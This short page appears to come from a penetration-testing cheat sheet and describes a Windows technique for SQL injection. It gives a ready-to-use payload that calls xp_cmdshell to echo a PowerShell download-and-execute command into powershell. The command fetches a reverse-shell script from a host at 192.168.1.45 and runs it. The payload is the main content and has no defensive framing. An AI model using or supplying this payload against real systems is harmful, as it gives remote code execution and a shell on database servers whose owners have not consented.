Clever Alternatives

Windows

At times it may not be possible to inject a reverse shell or download command directly into sqli, url stub , etc. In such cases the command can be echoed into powershell. Here is an example of using echo to push a download poweshell command into powershell in SQLi,

' EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://192.168.1.45/reverse.ps1") | powershell ' ; --

PreviousCrafty Executable NextGeneral Info

Last updated 8 days ago